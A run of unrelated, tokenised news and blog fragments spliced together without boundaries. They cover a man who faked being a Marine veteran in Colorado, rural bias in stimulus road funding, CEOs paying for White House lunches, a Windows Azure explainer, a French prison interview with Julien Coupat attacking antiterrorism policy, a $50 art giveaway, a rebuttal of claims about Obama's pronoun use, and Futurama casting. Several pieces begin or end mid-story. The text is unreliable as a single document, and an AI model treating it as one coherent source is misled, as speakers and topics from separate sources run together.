By mid-2007 , Strandlof was in Colorado , where his boyfriend had gotten a job .
“ I just followed along , ” he recalled .
What happened next , Strandlof said , is as much a mystery to him as anyone .
He said he did not set out to assume a new identity .
Yet that ’s what he did , bursting onto the scene as Rick Duncan , an ex-Marine outspoken against the war .
He also told new friends and the local media that he had been at the Pentagon when it was hit in the Sept. 11 attacks .
It ’s unclear whether his boyfriend , who could not be reached for comment , went along with his activities .
But now his hair was cropped short , and a fellow war protester , Rich Haber , said Strandlof was more muscular than he recalled him being in Reno -- as if he ’d worked out to develop a Marine physique .
He dressed in close - fitting T - shirts and sometimes a camouflage hat .
Advertisement
One day , Duncan introduced himself to Joe Barrera , a Vietnam veteran and activist .
“ He just calls me out of the blue one day , ” Barrera said .
“ He talks really fast , so fast it ’s hard to understand what he ’s saying .
He ’s got all kinds of wonderful ideas -- so eager to tell you . ”
Barrera agreed to help Duncan start an advocacy group for young veterans , though he had some misgivings .
For one thing , there was the scar , a small mark on the right side of Duncan ’s head .
If he ’d had major surgery , why was n’t it bigger ?
He also wondered why an openly gay man had n’t been kicked out of the service .
“ But I assumed he ’d hidden his orientation , and now that he was out , he was free to express it , ” Barrera said .
As for Duncan ’s erratic nature , he figured the brain injury and wounded psyche were to blame .
Advertisement
Barrera was n’t the only veteran to supply his own explanations for Duncan ’s oddities .
Terrance McWilliams , who recently retired as command sergeant major at Ft. Carson , also chalked them up to the injury .
“ There were moments where you could see he had a memory lapse , where you can just see he ’s trying to think of the next sentence to say , but he was having difficulty formulating it , ” he said .
Duncan apparently threw himself into his new world .
He formed the Colorado Veterans Alliance and organized open - mike nights where troops could discuss their war experiences .
When Duncan spoke , Barrera said , he was different than other young vets , who were typically stoic .
“ Tears would roll down his face , ” he said .
“ People in the audience would start to cry . ”
At such gatherings , volunteers would put together care packages for troops as Duncan collected donations to pay for the shipping .
Some , including local peace activist Mark Lewis , said they did n’t know whether Duncan actually sent the packages .
Last year , Duncan learned that Colorado Springs officials were conducting homeless sweeps , cleaning up encampments .
He said that police were confiscating homeless veterans ’ military papers and medals and demanded they stop .
Advertisement
“ I thought it was a reasonable approach , ” said Councilman Jerry Heimlicher .
“ He did n’t ask for any money .
All he wanted was to change how homeless people were treated . ”
But people began noticing the inconsistencies in his stories and how he was so unlike other veterans .
Duncan spoke incessantly about his PTSD , something that others never did .
“ They do n’t talk about it , and if they do , it ’s because they ’re drunk and it just comes out , ” Flaherty said .
His own board of directors at the veterans alliance quietly began to look into his past .
They discovered that a Rick Strandlof had reserved the name “ Colorado Veterans Alliance ” at the Colorado Secretary of State ’s Office , the Colorado Springs Gazette later reported .
They traced Strandlof ’s name to Nevada , where they found his car theft conviction -- at the very time when Duncan said he ’d been serving in Iraq .
Advertisement
The board contacted the FBI , which arranged a meeting with Duncan .
According to board members who attended , an agent asked if his name was Duncan or Strandlof .
Both , he replied .
Police arrested him on the outstanding traffic warrant .
The board quickly disbanded the Colorado Veterans Alliance , and the FBI launched an investigation into whether Strandlof had committed fraud or violated the federal Stolen Valor Act , which criminalizes false claims of being a decorated veteran .
When the story hit the local newspaper , reactions ranged from anger to confusion .
Advertisement
Some veterans joined a Facebook group demanding his prosecution .
“ He slandered the good name of thousands of people who have served honorably , ” one Florida man wrote on the website .
“ That mental illness excuse is bull -- he just wanted to be somebody . ”
Some veterans wondered whether they now would have to question the credibility of each vet they encountered .
“ I do n’t want to get into a position where if you tell me you ’re a veteran , I say , ‘ Prove it to me , ’ ” McWilliams said .
Others struggled over how to feel about him .
“ What harm did he really do ? ” asked Heimlicher , the City Council member .
Flaherty decided he still owed Strandlof a debt .
“ If it was n’t for Rick having good talks with me , ” he said , “ I probably would n’t have gotten help for my depression . ”
Advertisement
Neither he nor any of Strandlof ’s other onetime friends visited him in jail , where he remained for several weeks on a $ 1,000 bond .
No one wanted to help him , Strandlof said , and he understood why .
“ They have the right to be angry , ” he said .
He repeatedly denied that he had plotted his deceit , and said even he was n’t sure how it grew over time .
Yet Strandlof also said that he had a greater effect in his antiwar efforts as Duncan the veteran than he ever did as Strandlof the liberal protester .
“ Any good production has to have a compelling character , ” he said .
In June , Strandlof pleaded guilty in his traffic case and was released .
The FBI , meanwhile , is still investigating .
Advertisement
.
Two - thirds of the country lives in large metropolitan areas , home to the nation ’s worst traffic jams and some of its oldest roads and bridges .
But cities and their surrounding regions are getting far less than two - thirds of federal transportation stimulus money .
According to an analysis by The New York Times of 5,274 transportation projects approved so far  the most complete look yet at how states plan to spend their stimulus money  the 100 largest metropolitan areas are getting less than half the money from the biggest pot of transportation stimulus money .
In many cases , they have lost a tug of war with state lawmakers that urban advocates say could hurt the nation ’s economic engines .
The stimulus law provided $ 26.6 billion for highways , bridges and other transportation projects , but left the decision on how to spend most of it to the states , which have a long history of giving short shrift to major metropolitan areas when it comes to dividing federal transportation money .
Now that all 50 states have beat a June 30 deadline by winning approval for projects that will use more than half of that transportation money , worth $ 16.4 billion , it is clear that the stimulus program will continue that pattern of spending disproportionately on rural areas .
“ If we ’re trying to recover the nation ’s economy , we should be focusing where the economy is , which is in these large areas , ” said Robert Puentes , a senior fellow at the Brookings Institution ’s Metropolitan Policy Program , which advocates more targeted spending .
“ But states take this peanut - butter approach , taking the dollars and spreading them around very thinly , rather than taking the dollars and concentrating them where the most complex transportation problems are . ”
It is not only CEOs who go dutch when they eat with President Barack Obama .
It turns out that senior staff members do , too .
Earlier this week Politico's Eamon Javers reported that when four powerful corporate leaders came to have lunch with President Obama in June , White House staffers collected their credit card numbers so the CEOs could be billed for their meals .
The executives , who dined with the President in his private dining room just off the Oval Office , were Ursula Burns , CEO of Xerox Corporation ; Muhtar Kent , CEO of The Coca - Cola Company ; AT&T CEO Randall Stephenson ; and Honeywell International CEO Dave Cote .
A new group of CEO ’s came for lunch in the President ’s private dining room on Friday .
The July 31 gathering included Ivan Seidenberg , CEO of Verizon and Chairman of the Business Roundtable ; Mike Duke , CEO of Wal - Mart ; Dan DiMicco , CEO of Nucor ; and Howard Schultz , CEO of Starbucks .
Presumably all of them were happy to cover the cost of their meal in return for face time with the President .
Deputy Press Secretary Jennifer Psaki told Javers that , “ from time to time , White House guests are asked to reimburse for their meals , the reasons include ensuring there is no conflict or appearance of a conflict .
This is consistent with our tough ethics rules and we will continue the practice when appropriate . ”
The pay your own way policy evidently applies to White House staffers , as well .
Press Secretary Robert Gibbs was asked about the practice of billing presidential guests for their meals at a meeting with reporters on Friday .
“ I pay for my meals here .
I ate lunch with the president a few days ago ” and paid Gibbs said .
As Gibbs often does , he ended with a quip : “ I guess in Washington there really is no free lunch . ”
Ms. Psaki confirmed that the pay your own way policy applies to all White House staffers who eat with the boss , not just Gibbs .
" At first I was kind of afraid but I got used to it , " said Adam Kane , 10 , a visitor from Alton , Illinois , as clouds drifted past .
" Look at all those tiny things that are usually huge . "
Today at the Microsoft Partner Network conference in New Orleans , Microsoft announced the pricing and availability of Windows Azure .
But what is Windows Azure ?
Read on to find out .
What is Windows Azure ?
Windows Azure is Microsoft 's cloud computing offering .
It refers to applications that run remotely over the internet , on servers hosted by Microsoft itself , rather than on a company 's local machines .
Windows
Azure technology could also be used on locally - hosted machines , which is known as on - premise ' .
Using cloud computing is a much more efficient way of distributing applications and for gaining access to greater computing power .
I still do n't get it .
Why would you want to do put your applications in the cloud ?
Give me some examples .
Think of it as utility computing giving you access to on - demand ' computing that you can turn on or off at will .
Imagine a website selling concert tickets .
This will come under extremely heavy demand the moment a popular act 's tickets go on sale .
With utility computing it could plan in advance for those huge peaks , by renting the amount of computing power and storage it requires for that short amount of time .
Another example would be a TV show that advertised an activity on its website in order to make the programme more interactive .
That web site would receive a huge amount of traffic straight after the broadcast , but very little in the days after .
Voici les réponses aux questions que nous avons posées par écrit à Julien Coupat .
Mis en examen le 15 novembre 2008 pour " terrorisme " avec huit autres personnes interpellées à Tarnac ( Corrèze ) et Paris , il est soupçonné d'avoir saboté des caténaires SNCF .
Il est le dernier à être toujours incarcéré .
( Il a demandé que certains mots soient en italique . )
Comment vivez - vous votre détention ?
Très bien merci .
Tractions , course à pied , lecture .
Pouvez - nous nous rappeler les circonstances de votre arrestation ?
Une bande de jeunes cagoulés et armés jusqu'aux dents s'est introduite chez nous par effraction .
Ils nous ont menacés , menottés , et emmenés non sans avoir préalablement tout fracassé .
Ils nous ont enlevés à bord de puissants bolides roulant à plus de 170 km/h en moyenne sur les autoroutes .
Dans leurs conversations , revenait souvent un certain M. Marion [ ancien patron de la police antiterroriste ] dont les exploits virils les amusaient beaucoup comme celui consistant à gifler dans la bonne humeur un de ses collègues au beau milieu d'un pot de départ .
Ils nous ont séquestrés pendant quatre jours dans une de leurs " prisons du peuple " en nous assommant de questions où l'absurde le disputait à l'obscène .
Celui qui semblait être le cerveau de l'opération s'excusait vaguement de tout ce cirque expliquant que c'était de la faute des " services " , là-haut , où s'agitaient toutes sortes de gens qui nous en voulaient beaucoup .
A ce jour , mes ravisseurs courent toujours .
Certains faits divers récents attesteraient même qu'ils continuent de sévir en toute impunité .
Les sabotages sur les caténaires SNCF en France ont été revendiqués en Allemagne .
Qu'en dites - vous ?
Au moment de notre arrestation , la police française est déjà en possession du communiqué qui revendique , outre les sabotages qu'elle voudrait nous attribuer , d'autres attaques survenues simultanément en Allemagne .
Ce tract présente de nombreux inconvénients : il est posté depuis Hanovre , rédigé en allemand et envoyé à des journaux d'outre - Rhin exclusivement , mais surtout il ne cadre pas avec la fable médiatique sur notre compte , celle du petit noyau de fanatiques portant l'attaque au cœur de l'Etat en accrochant trois bouts de fer sur des caténaires .
On aura , dès lors , bien soin de ne pas trop mentionner ce communiqué , ni dans la procédure , ni dans le mensonge public .
Il est vrai que le sabotage des lignes de train y perd beaucoup de son aura de mystère : il s'agissait simplement de protester contre le transport vers l'Allemagne par voie ferroviaire de déchets nucléaires ultraradioactifs et de dénoncer au passage la grande arnaque de " la crise " .
Le communiqué se conclut par un très SNCF " nous remercions les voyageurs des trains concernés de leur compréhension " .
Quel tact , tout de même , chez ces " terroristes " !
Vous reconnaissez - vous dans les qualifications de " mouvance anarcho - autonome " et d'" ultragauche " ?
Laissez - moi reprendre d'un peu haut .
Nous vivons actuellement , en France , la fin d'une période de gel historique dont l'acte fondateur fut l'accord passé entre gaullistes et staliniens en 1945 pour désarmer le peuple sous prétexte d'" éviter une guerre civile " .
Les termes de ce pacte pourraient se formuler ainsi pour faire vite : tandis que la droite renonçait à ses accents ouvertement fascistes , la gauche abandonnait entre soi toute perspective sérieuse de révolution .
L'avantage dont joue et jouit , depuis quatre ans , la clique sarkozyste , est d'avoir pris l'initiative , unilatéralement , de rompre ce pacte en renouant " sans complexe " avec les classiques de la réaction pure – sur les fous , la religion , l'Occident , l'Afrique , le travail , l'histoire de France , ou l'identité nationale .
Face à ce pouvoir en guerre qui ose penser stratégiquement et partager le monde en amis , ennemis et quantités négligeables , la gauche reste tétanisée .
Elle est trop lâche , trop compromise , et pour tout dire , trop discréditée pour opposer la moindre résistance à un pouvoir qu'elle n'ose pas , elle , traiter en ennemi et qui lui ravit un à un les plus malins d'entre ses éléments .
Quant à l'extrême gauche à-la-Besancenot , quels que soient ses scores électoraux , et même sortie de l'état groupusculaire où elle végète depuis toujours , elle n'a pas de perspective plus désirable à offrir que la grisaille soviétique à peine retouchée sur Photoshop .
Son destin est de décevoir .
Dans la sphère de la représentation politique , le pouvoir en place n'a donc rien à craindre , de personne .
Et ce ne sont certainement pas les bureaucraties syndicales , plus vendues que jamais , qui vont l'importuner , elles qui depuis deux ans dansent avec le gouvernement un ballet si obscène .
Dans ces conditions , la seule force qui soit à même de faire pièce au gang sarkozyste , son seul ennemi réel dans ce pays , c'est la rue , la rue et ses vieux penchants révolutionnaires .
Elle seule , en fait , dans les émeutes qui ont suivi le second tour du rituel plébiscitaire de mai 2007 , a su se hisser un instant à la hauteur de la situation .
Elle seule , aux Antilles ou dans les récentes occupations d'entreprises ou de facs , a su faire entendre une autre parole .
Cette analyse sommaire du théâtre des opérations a dû s'imposer assez tôt puisque les renseignements généraux faisaient paraître dès juin 2007 , sous la plume de journalistes aux ordres ( et notamment dans Le Monde ) les premiers articles dévoilant le terrible péril que feraient peser sur toute vie sociale les " anarcho - autonomes " .
On leur prêtait , pour commencer , l'organisation des émeutes spontanées , qui ont , dans tant de villes , salué le" triomphe électoral " du nouveau président .
Avec cette fable des " anarcho - autonomes " , on a dessiné le profil de la menace auquel la ministre de l'intérieur s'est docilement employée , d'arrestations ciblées en rafles médiatiques , à donner un peu de chair et quelques visages .
Quand on ne parvient plus à contenir ce qui déborde , on peut encore lui assigner une case et l'y incarcérer .
Or celle de " casseur " où se croisent désormais pêle - mêle les ouvriers de Clairoix , les gamins de cités , les étudiants bloqueurs et les manifestants des contre - sommets , certes toujours efficace dans la gestion courante de la pacification sociale , permet de criminaliser des actes , non des existences .
Et il est bien dans l'intention du nouveau pouvoir de s'attaquer à l'ennemi , en tant que tel , sans attendre qu'il s'exprime .
Telle est la vocation des nouvelles catégories de la répression .
Il importe peu , finalement , qu'il ne se trouve personne en France pour se reconnaître " anarcho - autonome " ni que l'ultra - gauche soit un courant politique qui eut son heure de gloire dans les années 1920 et qui n'a , par la suite , jamais produit autre chose que d'inoffensifs volumes de marxologie .
Au reste , la récente fortune du terme " ultragauche " qui a permis à certains journalistes pressés de cataloguer sans coup férir les émeutiers grecs de décembre dernier doit beaucoup au fait que nul ne sache ce que fut l'ultragauche , ni même qu'elle ait jamais existé .
A ce point , et en prévision des débordements qui ne peuvent que se systématiser face aux provocations d'une oligarchie mondiale et française aux abois , l'utilité policière de ces catégories ne devrait bientôt plus souffrir de débats .
On ne saurait prédire , cependant , lequel d'" anarcho - autonome " ou d'" ultragauche " emportera finalement les faveurs du Spectacle , afin de reléguer dans l'inexplicable une révolte que tout justifie .
La police vous considère comme le chef d'un groupe sur le point de basculer dans le terrorisme .
Qu'en pensez - vous ?
Une si pathétique allégation ne peut être le fait que d'un régime sur le point de basculer dans le néant .
Que signifie pour vous le mot terrorisme ?
Rien ne permet d'expliquer que le département du renseignement et de la sécurité algérien suspecté d'avoir orchestré , au su de la DST , la vague d'attentats de 1995 ne soit pas classé parmi les organisations terroristes internationales .
Rien ne permet d'expliquer non plus la soudaine transmutation du " terroriste " en héros à la Libération , en partenaire fréquentable pour les accords d'Evian , en policier irakien ou en " taliban modéré " de nos jours , au gré des derniers revirements de la doctrine stratégique américaine .
Rien , sinon la souveraineté .
Est souverain , en ce monde , qui désigne le terroriste .
Qui refuse d'avoir part à cette souveraineté se gardera bien de répondre à votre question .
Qui en convoitera quelques miettes s'exécutera avec promptitude .
Qui n'étouffe pas de mauvaise foi trouvera un peu instructif le cas de ces deux ex – " terroristes " devenus l'un premier ministre d'Israël , l'autre président de l'Autorité palestinienne , et ayant tous deux reçus , pour comble , le Prix Nobel de la paix .
Le flou qui entoure la qualification de " terrorisme " , l'impossibilité manifeste de le définir ne tiennent pas à quelque provisoire lacune de la législation française : ils sont au principe de cette chose que l'on peut , elle , très bien définir : l'antiterrorisme dont ils forment plutôt la condition de fonctionnement .
L'antiterrorisme est une technique de gouvernement qui plonge ses racines dans le vieil art de la contre - insurrection , de la guerre dite " psychologique " , pour rester poli .
L'antiterrorisme , contrairement à ce que voudrait insinuer le terme , n'est pas un moyen de lutter contre le terrorisme , c'est la méthode par quoi l'on produit , positivement , l'ennemi politique en tant que terroriste .
Il s'agit , par tout un luxe de provocations , d'infiltrations , de surveillance , d'intimidation et de propagande , par toute une science de la manipulation médiatique , de l'" action psychologique " , de la fabrication de preuves et de crimes , par la fusion aussi du policier et du judiciaire , d'anéantir la " menace subversive " en associant , au sein de la population , l'ennemi intérieur , l'ennemi politique à l'affect de la terreur .
L'essentiel , dans la guerre moderne , est cette " bataille des cœurs et des esprits " où tous les coups sont permis .
Le procédé élémentaire , ici , est invariable : individuer l'ennemi afin de le couper du peuple et de la raison commune , l'exposer sous les atours du monstre , le diffamer , l'humilier publiquement , inciter les plus vils à l'accabler de leurs crachats , les encourager à la haine .
" La loi doit être utilisée comme simplement une autre arme dans l'arsenal du gouvernement et dans ce cas ne représente rien de plus qu'une couverture de propagande pour se débarrasser de membres indésirables du public .
Pour la meilleure efficacité , il conviendra que les activités des services judiciaires soient liées à l'effort de guerre de la façon la plus discrète possible " , conseillait déjà , en 1971 , le brigadier Frank Kitson [ ancien général de l'armée britannique , théoricien de la guerre contre - insurrectionelle ] , qui en savait quelque chose .
Une fois n'est pas coutume , dans notre cas , l'antiterrorisme a fait un four .
On n'est pas prêt , en France , à se laisser terroriser par nous .
La prolongation de ma détention pour une durée " raisonnable " est une petite vengeance bien compréhensible au vu des moyens mobilisés , et de la profondeur de l'échec ; comme est compréhensible l'acharnement un peu mesquin des " services " , depuis le 11 novembre , à nous prêter par voie de presse les méfaits les plus fantasques , ou à filocher le moindre de nos camarades .
Combien cette logique de représailles a d'emprise sur l'institution policière , et sur le petit cœur des juges , voilà ce qu'auront eu le mérite de révéler , ces derniers temps , les arrestations cadencées des " proches de Julien Coupat " .
Il faut dire que certains jouent , dans cette affaire , un pan entier de leur lamentable carrière , comme Alain Bauer [ criminologue ] , d'autres le lancement de leurs nouveaux services , comme le pauvre M. Squarcini [ directeur central du renseignement intérieur ] , d'autres encore la crédibilité qu'ils n'ont jamais eue et qu'ils n'auront jamais , comme Michèle Alliot - Marie .
Vous êtes issu d'un milieu très aisé qui aurait pu vous orienter dans une autre direction …
" Il y a de la plèbe dans toutes les classes " ( Hegel ) .
Pourquoi Tarnac ?
Allez -y , vous comprendrez .
Si vous ne comprenez pas , nul ne pourra vous l'expliquer , je le crains .
Vous définissez - vous comme un intellectuel ?
Un philosophe ?
La philosophie naît comme deuil bavard de la sagesse originaire .
Platon entend déjà la parole d'Héraclite comme échappée d'un monde révolu .
A l'heure de l'intellectualité diffuse , on ne voit pas ce qui pourrait spécifier " l'intellectuel " , sinon l'étendue du fossé qui sépare , chez lui , la faculté de penser de l'aptitude à vivre .
Tristes titres , en vérité , que cela .
Mais , pour qui , au juste , faudrait - il se définir ?
Etes-vous l'auteur du livre L'insurrection qui vient ?
C'est l'aspect le plus formidable de cette procédure : un livre versé intégralement au dossier d'instruction , des interrogatoires où l'on essaie de vous faire dire que vous vivez comme il est écrit dans L'insurrection qui vient , que vous manifestez comme le préconise L'insurrection qui vient , que vous sabotez des lignes de train pour commémorer le coup d'Etat bolchevique d'octobre 1917 , puisqu'il est mentionné dans L'insurrection qui vient , un éditeur convoqué par les services antiterroristes .
De mémoire française , il ne s'était pas vu depuis bien longtemps que le pouvoir prenne peur à cause d'un livre .
On avait plutôt coutume de considérer que , tant que les gauchistes étaient occupés à écrire , au moins ils ne faisaient pas la révolution .
Les temps changent , assurément .
Le sérieux historique revient .
Ce qui fonde l'accusation de terrorisme , nous concernant , c'est le soupçon de la coïncidence d'une pensée et d'une vie ; ce qui fait l'association de malfaiteurs , c'est le soupçon que cette coïncidence ne serait pas laissée à l'héroïsme individuel , mais serait l'objet d'une attention commune .
Négativement , cela signifie que l'on ne suspecte aucun de ceux qui signent de leur nom tant de farouches critiques du système en place de mettre en pratique la moindre de leurs fermes résolutions ; l'injure est de taille .
Malheureusement , je ne suis pas l'auteur de L'insurrection qui vient – et toute cette affaire devrait plutôt achever de nous convaincre du caractère essentiellement policier de la fonction auteur .
J'en suis , en revanche , un lecteur .
Le relisant , pas plus tard que la semaine dernière , j'ai mieux compris la hargne hystérique que l'on met , en haut lieu , à en pourchasser les auteurs présumés .
Le scandale de ce livre , c'est que tout ce qui y figure est rigoureusement , catastrophiquement vrai , et ne cesse de s'avérer chaque jour un peu plus .
Car ce qui s'avère , sous les dehors d'une " crise économique " , d'un " effondrement de la confiance " , d'un " rejet massif des classes dirigeantes " , c'est bien la fin d'une civilisation , l'implosion d'un paradigme : celui du gouvernement , qui réglait tout en Occident – le rapport des êtres à eux-mêmes non moins que l'ordre politique , la religion ou l'organisation des entreprises .
Il y a , à tous les échelons du présent , une gigantesque perte de maîtrise à quoi aucun maraboutage policier n'offrira de remède .
Ce n'est pas en nous transperçant de peines de prison , de surveillance tatillonne , de contrôles judiciaires , et d'interdictions de communiquer au motif que nous serions les auteurs de ce constat lucide , que l'on fera s'évanouir ce qui est constaté .
Le propre des vérités est d'échapper , à peine énoncées , à ceux qui les formulent .
Gouvernants , il ne vous aura servi de rien de nous assigner en justice , tout au contraire .
Vous lisez " Surveiller et punir " de Michel Foucault .
Cette analyse vous paraît - elle encore pertinente ?
La prison est bien le sale petit secret de la société française , la clé , et non la marge des rapports sociaux les plus présentables .
Ce qui se concentre ici en un tout compact , ce n'est pas un tas de barbares ensauvagés comme on se plaît à le faire croire , mais bien l'ensemble des disciplines qui trament , au - dehors , l'existence dite " normale " .
Surveillants , cantine , parties de foot dans la cour , emploi du temps , divisions , camaraderie , baston , laideur des architectures : il faut avoir séjourné en prison pour prendre la pleine mesure de ce que l'école , l'innocente école de la République , contient , par exemple , de carcéral .
Envisagée sous cet angle imprenable , ce n'est pas la prison qui serait un repaire pour les ratés de la société , mais la société présente qui fait l'effet d'une prison ratée .
La même organisation de la séparation , la même administration de la misère par le shit , la télé , le sport , et le porno règne partout ailleurs avec certes moins de méthode .
Pour finir , ces hauts murs ne dérobent aux regards que cette vérité d'une banalité explosive : ce sont des vies et des âmes en tout point semblables qui se traînent de part et d'autre des barbelés et à cause d'eux .
Si l'on traque avec tant d'avidité les témoignages " de l'intérieur " qui exposeraient enfin les secrets que la prison recèle , c'est pour mieux occulter le secret qu'elle est : celui de votre servitude , à vous qui êtes réputés libres tandis que sa menace pèse invisiblement sur chacun de vos gestes .
Toute l'indignation vertueuse qui entoure la noirceur des geôles françaises et leurs suicides à répétition , toute la grossière contre - propagande de l'administration pénitentiaire qui met en scène pour les caméras des matons dévoués au bien - être du détenu et des directeurs de tôle soucieux du " sens de la peine " , bref : tout ce débat sur l'horreur de l'incarcération et la nécessaire humanisation de la détention est vieux comme la prison .
Il fait même partie de son efficace , permettant de combiner la terreur qu'elle doit inspirer avec son hypocrite statut de châtiment " civilisé " .
Le petit système d'espionnage , d'humiliation et de ravage que l'Etat français dispose plus fanatiquement qu'aucun autre en Europe autour du détenu n'est même pas scandaleux .
L'Etat le paie chaque jour au centuple dans ses banlieues , et ce n'est de toute évidence qu'un début : la vengeance est l'hygiène de la plèbe .
Mais la plus remarquable imposture du système judiciaro - pénitentiaire consiste certainement à prétendre qu'il serait là pour punir les criminels quand il ne fait que gérer les illégalismes .
N'importe quel patron – et pas seulement celui de Total – , n'importe quel président de conseil général – et pas seulement celui des Hauts - de - Seine– , n'importe quel flic sait ce qu'il faut d'illégalismes pour exercer correctement son métier .
Le chaos des lois est tel , de nos jours , que l'on fait bien de ne pas trop chercher à les faire respecter et les stups , eux aussi , font bien de seulement réguler le trafic , et non de le réprimer , ce qui serait socialement et politiquement suicidaire .
Le partage ne passe donc pas , comme le voudrait la fiction judiciaire , entre le légal et l'illégal , entre les innocents et les criminels , mais entre les criminels que l'on juge opportun de poursuivre et ceux qu'on laisse en paix comme le requiert la police générale de la société .
La race des innocents est éteinte depuis longtemps , et la peine n'est pas à ce à quoi vous condamne la justice : la peine , c'est la justice elle - même , il n'est donc pas question pour mes camarades et moi de " clamer notre innocence " , ainsi que la presse s'est rituellement laissée aller à l'écrire , mais de mettre en déroute l'hasardeuse offensive politique que constitue toute cette infecte procédure .
Voilà quelques - unes des conclusions auxquelles l'esprit est porté à relire Surveiller et punir depuis la Santé .
On ne saurait trop suggérer , au vu de ce que les Foucaliens font , depuis vingt ans , des travaux de Foucault , de les expédier en pension , quelque temps , par ici .
Comment analysez - vous ce qui vous arrive ?
Détrompez - vous : ce qui nous arrive , à mes camarades et à moi , vous arrive aussi bien .
C'est d'ailleurs , ici , la première mystification du pouvoir : neuf personnes seraient poursuivies dans le cadre d'une procédure judiciaire " d'association de malfaiteurs en relation avec une entreprise terroriste " , et devraient se sentir particulièrement concernées par cette grave accusation .
Mais il n'y a pas d'" affaire de Tarnac " pas plus que d'" affaire Coupat " , ou d'" affaire Hazan " [ éditeur de L'insurrection qui vient ] .
Ce qu'il y a , c'est une oligarchie vacillante sous tous rapports , et qui devient féroce comme tout pouvoir devient féroce lorsqu'il se sent réellement menacé .
Le Prince n'a plus d'autre soutien que la peur qu'il inspire quand sa vue n'excite plus dans le peuple que la haine et le mépris .
Ce qu'il y a , c'est , devant nous , une bifurcation , à la fois historique et métaphysique : soit nous passons d'un paradigme de gouvernement à un paradigme de l'habiter au prix d'une révolte cruelle mais bouleversante , soit nous laissons s'instaurer , à l'échelle planétaire , ce désastre climatisé où coexistent , sous la férule d'une gestion " décomplexée " , une élite impériale de citoyens et des masses plébéiennes tenues en marge de tout .
Il y a donc , bel et bien , une guerre , une guerre entre les bénéficiaires de la catastrophe et ceux qui se font de la vie une idée moins squelettique .
Il ne s'est jamais vu qu'une classe dominante se suicide de bon cœur .
La révolte a des conditions , elle n'a pas de cause .
Combien faut - il de ministères de l'Identité nationale , de licenciements à la mode Continental , de rafles de sans - papiers ou d'opposants politiques , de gamins bousillés par la police dans les banlieues , ou de ministres menaçant de priver de diplôme ceux qui osent encore occuper leur fac , pour décider qu'un tel régime , même installé par un plébiscite aux apparences démocratiques , n'a aucun titre à exister et mérite seulement d'être mis à bas ?
C'est une affaire de sensibilité .
La servitude est l'intolérable qui peut être infiniment tolérée .
Parce que c'est une affaire de sensibilité et que cette sensibilité - là est immédiatement politique ( non en ce qu'elle se demande " pour qui vais - je voter ? " , mais " mon existence est- elle compatible avec cela ? " ) , c'est pour le pouvoir une question d'anesthésie à quoi il répond par l'administration de doses sans cesse plus massives de divertissement , de peur et de bêtise .
Et là où l'anesthésie n'opère plus , cet ordre qui a réuni contre lui toutes les raisons de se révolter tente de nous en dissuader par une petite terreur ajustée .
Nous ne sommes , mes camarades et moi , qu'une variable de cet ajustement - là .
On nous suspecte comme tant d'autres , comme tant de " jeunes " , comme tant de " bandes " , de nous désolidariser d'un monde qui s'effondre .
Sur ce seul point , on ne ment pas .
Heureusement , le ramassis d'escrocs , d'imposteurs , d'industriels , de financiers et de filles , toute cette cour de Mazarin sous neuroleptiques , de Louis Napoléon en version Disney , de Fouché du dimanche qui pour l'heure tient le pays , manque du plus élémentaire sens dialectique .
Chaque pas qu'ils font vers le contrôle de tout les rapproche de leur perte .
Chaque nouvelle " victoire " dont ils se flattent répand un peu plus vastement le désir de les voir à leur tour vaincus .
Chaque manœuvre par quoi ils se figurent conforter leur pouvoir achève de le rendre haïssable .
En d'autres termes : la situation est excellente .
Ce n'est pas le moment de perdre courage .
Propos recueillis par Isabelle Mandraud et Caroline Monnot
A couple of weeks ago on our Facebook fan page , we asked the following question , just to see how people would respond :
“ If I gave you $ 50 today , with the condition that you had to spend it on “ art ” , what would you do with it ? ”
The question was very popular .
We immediately received a ton of wonderful answers .
85 in all .
Later that night , talking with Sara , we thought it would be fun to actually fund a few of the responses that were posted .
It was n’t something that we had thought about when we asked the question .
We were just curious what people would say .
One response that we liked a lot came from Ché Francisco Ortiz .
He wrote :
“ Buy a ton of sidewalk chalk and give it out to every kid i saw at the park or boardwalk . ”
So that night we sent Che $ 50 to buy his chalk via Paypal .
This past weekend Che bought the chalk and headed to the boardwalk .
Yesterday we received a link to Che ’s Flickr site which includes tons of photos of kids and their parents drawing and having an amazing time .
We were absolutely thrilled .
« previous post | next post »
Mary Kate Cary ( " Barack Obama Journeys From ' Yes We Can ' to the Imperial ' I ' " , U.S. News and World Report , 6/9/2009 ) joins the media chorus :
" The Great I Am . "
That 's what Dorothy Walker Bush , the matriarch of the Bush family , used to call it when one of her children used too many " I's " in a sentence .
Casting it in biblical terms , she 'd tell them , " Nobody likes The Great I Am . Do n't be talking about yourself . " [… ]
I tell you all this because I 've noticed lately that President Obama used to be that way , too . [… ]
But lately he 's moved from the second person to the first person .
Apparently I 'm not the only one who 's picked up on it .
Stanley Fish blogs in the New York Times that [… etc . …]
George Will 's column earlier this week points out that the president has become " inordinately fond of the first - person singular pronoun , " as evidenced in the GM takeover speech .
Terence Jeffrey of CSN wrote a similar piece about the same speech titled " I , Barack , " talking about the economic implications of the switch from " we " to " I " [… ]
As pointed out at tedious length in a series of earlier posts , the only trouble with this theory is that Barack Obama uses " The Great I Am " at a significantly lower rate , in comparable speeches and press interactions , than either Bill Clinton or George W. Bush did .
Since Ms. Cary — identified as " a former White House speechwriter for President George H.W. Bush " — brings up the elder Bush as a paragon of I - lessness , let 's do another comparison of Inaugural Addresses :
Document Word count 1st sing .
count 1st sing .
percent GHW Bush Inaugural ( 1989 ) 2291 39 1.7 % BH Obama Inaugural ( 2009 ) 2409 5 0.2 %
So , in point of fact , Obama 's inaugural address used the first - person singular 8 times less often , in percentage terms , than Bush 41 's inaugural did .
OK , how about their first press conferences , which are more informal and thus likely to have a higher rate of first - singular pronoun uses ?
Document Word count 1st sing .
count 1st sing .
percent GHW Bush ( 1/27/1989 ) 4600 252 5.48 % BH Obama ( 2/9/2009 ) 7775 206 2.65 %
So in this setting , Obama used The Great I Am less than half as often as Bush 41 , in percentage terms .
Oh , and in that GM takeover speech that Cary ( following the rest of the pack ) singles out , Obama used first - singular pronouns at a rate of merely 1.7 % .
Compare George H.W. Bush 's Radio Address to the Nation on the Economy ( 2/22/1992 ) , where first - person singular pronouns achieved the rate of 4.5 % , more than two and a half times more frequent .
I try not to think badly of others , really I do .
But people like Cary , Will , Fish , and Jeffrey make it hard to maintain the pretense that members of our punditocracy are either rational or honest .
I wonder who'll brainlessly replicate the meme next ?
Permalink
How did we miss this news ?!
Thanks to the mighty power of nerd outrage , Futurama will be returning to TV with all of its original voices intact rather than with soundalikes .
Advertisement
Here 's the letter that was sent to anyone who harassed casting director Scott Muller :
